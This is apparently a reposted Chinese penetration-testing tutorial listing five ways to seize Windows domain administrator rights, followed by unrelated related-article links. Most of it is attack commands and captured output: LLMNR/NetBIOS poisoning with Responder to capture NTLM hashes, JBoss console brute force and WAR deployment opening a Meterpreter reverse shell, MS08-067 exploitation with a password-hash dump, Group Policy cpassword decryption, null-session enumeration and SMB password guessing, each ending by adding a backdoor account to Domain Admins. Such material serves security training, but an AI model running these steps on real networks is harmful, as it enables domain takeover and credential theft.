得到内网域管理员的5种常见方法<转>
1.Netbios and LLMNR Name Poisoning
这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html),但实际测试还是Responder比较好,都是套用标准库写的,很方便在目标上使用:)
- ~/Responder# python Responder.py -i 192.168.8.25NBT Name Service/LLMNR Answerer 1.0.Please send bugs/comments to: [email]lgaffie@trustwave.comTo[/email] kill this script hit CRTL-C[+]NBT-NS & LLMNR responder startedGlobal Parameters set:Challenge set is: 1122334455667788WPAD Proxy Server is:OFFHTTP Server is:ONHTTPS Server is:ONSMB Server is:ONSMB LM support is set to:0SQL Server is:ONFTP Server is:ONDNS Server is:ONLDAP Server is:ONFingerPrint Module is:OFFLLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.LLMNR poisoned answer sent to this IP: 192.168.8.112. The requested name was : wpad.LLMNR poisoned answer sent to this IP: 192.168.8.12. The requested name was : 110.…snip…NBT-NS Answer sent to: 192.168.8.6[+]SMB-NTLMv2 hash captured from : 192.168.8.6Domain is : BEACONHILLSHIGHUser is : smccall[+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghashShare requested: \\ECONOMY309\IPC$…snip...LLMNR poisoned answer sent to this IP: 192.168.8.11. The requested name was : wpad.[+]SMB-NTLMv2 hash captured from : 192.168.8.11Domain is : BEACONHILLSHIGHUser is : lmartin[+]SMB complete hash is : lmartin:: BEACONHILLSHIGH:1122334455667788:reallylonghashShare requested: \\ADVCHEM\311IPC$…snip…
这里的LM, NTLMv1, or NTLMv2哈希,能够用GPU或者彩虹表暴力破解.如果在responder会话过程中,抓到一个域管理员帐号,能够直接使用winexe运行cmd.exe命令
- ~/work/nmap# ~/SpiderLabs/winexe-PTH -U BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domainnet user twadmin $piD3rsRul3! /add /domainThe request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully.C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domainnet group "Domain Admins" twadmin /add /domainThe request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully.
2.利用jboss漏洞
可以前期先用nmap扫描下端口,识别出常见的JAVA应用服务器,后期配合Metasploit的auxiliary模块来利用.比如jboss漏洞.最常见的就是弱口令了吧,同理的,也可以寻找webloigc,websphere,tomcat等这些基于JAVA的应用服务器,还有最近国内政府部门部署比较多的Apusic,不过需要注意war包格式,进后台,直接部署WAR就行了.jboss的除了弱口令,还有个后台绕过,和流传很久的1337那个.用例说下如何用metasploit暴力破解jboss后台,以及部署war包.
- msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> http.jboss.8080~/work/nmap# cat http.jboss.8080 <-- 这个是开25线程字典跑8080端口jboss后台的[*] Initializing modules... THREADS => 25 RHOSTS => file:./8080 DICTIONARY => ./http.scan.list RPORT => 8080 [*] Detecting error code [*] Detecting error code [*] Detecting error code [*] Detecting error code [*] Using code '404' as not found for 192.168.5.18 [*] Using code '404' as not found for 192.168.5.21 [*] Using code '404' as not found for 192.168.5.20 [*] Found [url]http://192.168.5.20:8080/web-console/[/url] 401 (192.168.5.20) [*] [url]http://192.168.5.20:8080/web-console/[/url] requires authentication: Basic realm="JBoss JMX Console" [*] Found [url]http://192.168.5.20:8080/web-console/[/url] 404 (192.168.5.20) [*] Found [url]http://192.168.5.20:8080/jmx-console/[/url] 401 (192.168.5.20) [*] [url]http://192.168.5.20:8080/jmx-console/[/url] requires authentication: Basic realm="JBoss JMX Console" [*] Found [url]http://192.168.5.21:8080/jmx-console/[/url] 404 (192.168.5.21) [*] Scanned 4 of 4 hosts (100% complete) [*] Auxiliary module execution completedOutput from use auxiliary/scanner/http/jboss_vulnscan:[*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires authentication (401): Basic realm="JBoss JMX Console" [*] 192.168.5.20:8080 Check for verb tampering (HEAD) [+] 192.168.5.20:8080 Got authentication bypass via HTTP verb tampering [+] 192.168.5.20:8080 Authenticated using admin:admin [+] 192.168.5.20:8080 /status does not require authentication (200) [+] 192.168.5.20:8080 /web-console/ServerInfo.jsp does not require authentication (200) [+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200) [+] 192.168.5.20:8080 /invoker/JMXInvokerServlet does not require authentication (200)Output from use exploit/multi/http/jboss_maindeployer: <--部署war包msf exploit(jboss_maindeployer) > exploit[*] Started reverse handler on 192.168.5.233:4444[*] Sorry, automatic target detection doesn't work with HEAD requests [*] Automatically selected target "Java Universal" [*] Starting up our web service on [url]http://192.168.5.233:1337/HlusdqEcokvXH.war[/url] ... [*] Using URL: http:// 192.168.5.233:1337/HlveuqEzrovXH.war [*] Asking the JBoss server to deploy (via MainDeployer) [url]http://192.168.5.233:1337/HlusdqEcokvXH.war[/url] [*] Sending the WAR archive to the server... [*] Sending the WAR archive to the server... [*] Waiting for the server to request the WAR archive.... [*] Shutting down the web service... [*] Executing HlusdqEcokvXH... [+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp' [*] Undeploying HlusdqEcokvXH... [*] Sending stage (30355 bytes) to 192.168.5.159 [*] Meterpreter session 1 opened (192.168.5.233:4444 -> 192.168.5.20:4209) at 2013-09-15 19:00:06 -0600meterpreter > sysinfo Computer : BHHSMOFF011 OS : Windows 2003 5.2 (x86) Meterpreter : java/javameterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.C:\DELLBAC\EJBContainer\bin>whoami whoami beaconhillshigh\backup_adminC:\>net user twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully.C:\>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu.The command completed successfully.
3.MS08-067
这个漏洞已经超过4年了,但是内网中还是有很多机器没有打补丁,影响的有(Windows Server 2000, Windows Server 2003, and Windows XP),不过说实话,我内网渗透的过程中很少用MS08-067,因为溢出不好,有可能造成DOS,被人发现了,就不好了,你懂得.
- nmap --script=smb-check-vulns.nse -v -v -p 445,139 -iL smb -oA ms08 less ms08.nmap <-- 使用NMAP的smb-check-vulns脚本识别下...snip...Nmap scan report for shelob-squared (192.168.1.103) Host is up (0.00042s latency). Scanned at 2013-09-16 21:52:32 CDT for 55s PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:E3:25:78 (VMware)Host script results: | smb-check-vulns: | MS08-067: VULNERABLE <--bingo..有漏洞| Conficker: Likely CLEAN | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)...snip...
nmap的NSE脚本是用LUA语言写的,把这些NSE都过一遍,对渗透很有帮助哦,尤其是在LINUX平台,win平台下除了有几种扫描方式利用不了,NSE脚本照样可以用,不过LINUX上默认安装的NMAP版本都比较低了,你不能直接放NSE到目录,注意看库之间的依赖关系,才能利用,上次看wooyun的drops,livers大牛回复我们组的Anthr@X牛的InsightScan.py,说用nse也实现了一个,我只想说,你能偷偷发我一份吗? 接下来,还是用metasploit溢出,不知道对中文系统效果怎么样,我没有试过 =.=
- msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 msf exploit(ms08_067_netapi) > set TARGET 0 TARGET => 0 msf exploit(ms08_067_netapi) > set LHOST 192.168.1.215 LHOST => 192.168.1.215 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.103 [*] Meterpreter session 1 opened (192.168.1.215:33354 -> 192.168.1.103:4444) at 2013-09-16 21:54:15 -0500meterpreter > getsystem ...got system (via technique 1). meterpreter > sysinfo Computer : SHELOB-SQUARED OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints...Frodo:"what do i have" Samwise:"Frodo" Stryder:"love" Legolas:"favorite saying" Gimli:"what am i" Boromir:"what I am" Gandalf:"moria"[*] Dumping password hashes... Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8::: Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0::: Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622::: Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5::: Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a::: Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818::: Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2::: Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446:::meterpreter > shell Process 2708 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\GandalfC:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.
4. GPO cpassword
这个原理完全可以看瞌睡龙牛翻译的http://drops.wooyun.org/papers/576,本文中亮点是他从LINUX连接到WIN的,有许多同学不会通过linux渗透WIN域,尤其是在得到一个WEBSHELL,还是ROOT权限,还是跟内网连着,还有个域用户的情况下(=.=现实中哪儿有这么多好的条件让你都碰到了)
- smbclient -W MIRKWOOD -U ‘Legolas%orcs’ \\\\192.168.1.105\\SYSVOL <--使用smbclient连接, 支持上传下载Domain=[ MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1] smb: \> dir . D 0 Wed Sep 15 15:08:37 2012.. D 0 Wed Sep 15 15:08:37 2012 mirkwood.local D 0 Wed Sep 15 15:08:37 201248457 blocks of size 4194304. 44175 blocks availablesmb: \> cd mirkwood.local\ smb: \smirkwood.local\> dir . D 0 Wed Sep 15 15:13:05 2012 .. D 0 Wed Sep 15 15:13:05 2012 Policies D 0 Tue Oct 30 10:29:31 2012 scripts D 0 Thu Nov 8 12:50:21 2012smb:\> recursesmb:\> prompt off smb:\> mget Policies …snip…getting file \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/sec) (average 3657.0 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as access34.admx (27324.5 KiloBytes/sec) (average 7038.2 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\ActiveXInstallService.admx of size 7217 as ActiveXInstallService.admx (2303.1 KiloBytes/sec) (average 6722.5 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AddRmvPrograms.admx of size 7214 as AddRmvPrograms.admx (2301.6 KiloBytes/sec) (average 6446.2 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/sec) (average 4940.4 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AppCompat.admx of size 4893 as AppCompat.admx (2633.2 KiloBytes/sec) (average 4835.6 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AttachmtMgr.admx of size 3865 as AttachmtMgr.admx (2912.5 KiloBytes/sec) (average 4752.0 KiloBytes/sec) getting file \ mirkwood \Policies\PolicyDefinitions\AutoPlay.admx of size 5591 as AutoPlay.admx …snip…smb:\> recurse smb:\> prompt off smb:\> mget scripts …snip…smb: \avi\> mget scripts Get directory scripts? y Get directory bin? y Get file #INCLUDE.BAT? y getting file \ mirkwood \scripts\bin\#INCLUDE.BAT of size 2839 as #INCLUDE.BAT (409.6 KiloBytes/sec) (average 409.7 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON.BAT of size 1438 as NETLOGON.BAT (28.9 KiloBytes/sec) (average 137.7 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON2.BAT of size 16781 as NETLOGON2.BAT (691.0 KiloBytes/sec) (average 566.0 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON3.BAT of size 16486 as NETLOGON3.BAT (1268.5 KiloBytes/sec) (average 773.6 KiloBytes/sec) getting file \ mirkwood \scripts\bin\NETLOGON4.BAT of size 17429 as NETLOGON4.BAT (1108.7 KiloBytes/sec) (average 858.8 KiloBytes/sec) …snip…
Once the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):
- grep -ri administrator .grep -ri cpassword .~/work/nmap/192.168.1.0-24/downloads/Policies# grep -ri administrator . ./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
The cpassword is taken and run through the decryption script from http://carnal0wnage.attackresear ... s-and-getting.html.
- ~/work# ruby decrypt.rb <--解密Local*P4ssword!~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\’Administrator%Local*P4ssword!’ --uninstall --system //192.168.1.103 cmd.exe <-- winexe和win下经典工具psexec效果一样一样的Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp.C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.
5.NetBIOS Null Enumeration Allowed on Server
其实就是说,域服务器,允许你空会话连接,然后列举账户信息,然后在破解账户,LINUX下用enum4linux.pl遍历用户,用medusa破解帐号,用winexec连接执行命令.WIN下的话,<<黑客大曝光>>查点那章看过木?
- ~/enum4linux.pl -u Legolas -p orcs -w MIRKWOOD -a 192.168.1.90 >> enum-192.168.1.90~/work/targets/192.168.1.0-24# cat enum-192.168.1.90 Starting enum4linux v0.8.7 ( [url]http://labs.portcullis.co.uk/application/enum4linux/[/url] ) on Tue Sep 10 10:15:14 2013========================== | Target Information | ========================== Target ........... 192.168.1.90 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none=================================================== | Enumerating Workgroup/Domain on 192.168.1.90 | =================================================== [+] Got domain/workgroup name: MIRKWOOD=========================================== | Nbtstat Information for 192.168.1.90 |=========================================== Looking up status of 192.168.1.90 MODOR <00> - M Workstation Service MIRKWOOD <00> - M Domain/Workgroup Name MIRKWOOD <1c> - M Domain Controllers MORDOR <20> - M File Server ServiceMAC Address = B5-AD-2F-37-2G-4F==================================== | Session Check on 192.168.1.90 | ==================================== [+] Server 192.168.1.90 allows sessions using username '', password '' …snip…============================ | Users on 192.168.1.90 | ============================ index: 0x2b76 RID: 0xd08 acb: 0x00000610 Account: Administrator Name: Administrator Desc: (null) index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo Name: Frodo Baggins Desc: (null) index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise Name: Samwise Gamgee User Desc: (null) index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder Name: Aragorn User Desc: (null) index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null) index: 0x1824 RID: 0xb0c acb: 0x00010014 Account: Gimli Name: Gimli son of Glóin Desc: (null) index: 0x1825 RID: 0xb0d acb: 0x00300014 Account: Boromir Name: Boromir son of Denethor II Desc: (null) index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf Name: Gandalf the Gray Desc: (null) index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: gollum Name: gollum Desc: (null) …snip…~/work/targets/192.168.1.90# cat enum-192.168.1.90 .txt | grep "Domain Admins" Group 'Administrators' (RID: 544) has member: MIRKWOOD\Domain Admins Group:[Domain Admins] rid:[0x200] Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group) S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group)~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusaACCOUNT CHECK: [smbnt] Host: 192.168.1.1 (1 of 62, 0 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.100 (2 of 62, 1 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: 192.168.1.106 (4 of 62, 3 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.107 (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.107 User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [smbnt] Host: 192.168.1.11 (7 of 62, 6 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [smbnt] Host: 192.168.1.11 User: gollum Password: gollum [SUCCESS] …snip…~/work/nmap# ~/SpiderLabs/winexe-PTH -U MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exeMicrosoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\gollumC:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD.The command completed successfully.
得到内网域管理员的5种常见方法<转>的更多相关文章
- 对国外某hotel的内网域简单渗透
Penetration Testing不单单是一个博客,更热衷于技术分享的平台. 本文将讲述对国外某一hotel的渗透测试,让更多的人安全意识得到提高,有攻才有防,防得在好,也有疏忽的地方,这就是为啥 ...
- Python爬虫突破封禁的6种常见方法
转 Python爬虫突破封禁的6种常见方法 2016年08月17日 22:36:59 阅读数:37936 在互联网上进行自动数据采集(抓取)这件事和互联网存在的时间差不多一样长.今天大众好像更倾向于用 ...
- jQuery ajax调用后台aspx后台文件的两种常见方法(不是ashx)
在asp.net webForm开发中,用Jquery ajax调用aspx页面的方法常用的有两种:下面我来简单介绍一下. [WebMethod] public static string SayHe ...
- JS数组去重的几种常见方法
JS数组去重的几种常见方法 一.简单的去重方法 // 最简单数组去重法 /* * 新建一新数组,遍历传入数组,值不在新数组就push进该新数组中 * IE8以下不支持数组的indexOf方法 * */ ...
- JS去重的几种常见方法
JS数组去重的几种常见方法 一.简单的去重方法 // 最简单数组去重法 /* * 新建一新数组,遍历传入数组,值不在新数组就push进该新数组中 * IE8以下不支持数组的indexOf方法 * */ ...
- 连上VPN后,如何访问内网(添加路由表实现网络分流方法)
route add 192.168.4.0 mask 255.255.255.0 192.168.2.0 metric 1 不止有“邮件系统”会出现这种情况,还有其他情况,这时,你需要在没有连接外网和 ...
- Springboot中关于跨域问题的一种解决方法
前后端分离开发中,跨域问题是很常见的一种问题.本文主要是解决 springboot 项目跨域访问的一种方法,其他 javaweb 项目也可参考. 1.首先要了解什么是跨域 由于前后端分离开发中前端页面 ...
- 内网域渗透之MS14-068复现
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
- 内网域渗透之MS14-068复现(CVE-2014-6324)
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
随机推荐
- 在Windows下编译ffmpeg完全手册
本文的内容几乎全部来自于FFmpeg on Windows,但是由于国内的网络封锁,很难访问这个域名下的内容,因此我一方面按照我自己的理解和实践做了翻译,另一方面也是为了能提供一个方便的参考方法. 注 ...
- <摘录>PS和TS流的区别
在 MPEG-2系统中,信息复合/分离的过程称为系统复接/分接,由视频,音频的ES流和辅助数据复接生成的用于实际传输的标准信息流称为MPEG-2传送 流(TS:TransportStream).据传输 ...
- IE下JS接受ActiveX控件方法
1.常规写法 <SCRIPT type="text/javascript" FOR="activexID" EVENT="onXXXevent( ...
- 在delphi中, reintroduce作用
在delphi中, reintroduce作用 当在子类中重载或者重新声明父类的虚方法时,使用 reintroduce 关键字告知编译器,可以消除警告信息.如: TPar ...
- Java 单元测试(Junit)
在有些时候,我们需要对我们自己编写的代码进行单元测试(好处是,减少后期维护的精力和费用),这是一些最基本的模块测试.当然,在进行单元测试的同时也必然得清楚我们测试的代码的内部逻辑实现,这样在测试的时候 ...
- Oracle数据库表结构导出
1. 在PL/SQL中找到"工具--导出用户对象"菜单.点击运行.
- HDU 5749 Colmerauer 单调队列+暴力贡献
BestCoder Round #84 1003 分析:(先奉上zimpha巨官方题解) 感悟:看到题解单调队列,秒懂如何处理每个点的范围,但是题解的一句算贡献让我纠结半天 已知一个点的up,do ...
- 《Python 学习手册4th》 第九章 元组、文件及其他
''' 时间: 9月5日 - 9月30日 要求: 1. 书本内容总结归纳,整理在博客园笔记上传 2. 完成所有课后习题 注:“#” 后加的是备注内容 (每天看42页内容,可以保证月底看完此书) “重点 ...
- DzzOffice管理员登陆方法和管理员应用介绍
DzzOffice的管理方式类似于windows的管理方式,是直接在桌面中,通过管理员应用进行系统中的所有管理里工作. 1.访问http://www.domain.com (你站点的访问地址) 2.点 ...
- [原创]一种Unity2D多分辨率屏幕适配方案
此文将阐述一种简单有效的Unity2D多分辨率屏幕适配方案,该方案适用于基于原生开发的Unity2D游戏,即没有使用第三方2D插件,如Uni2D,2D toolkit等开发的游戏,NGUI插件不受这个 ...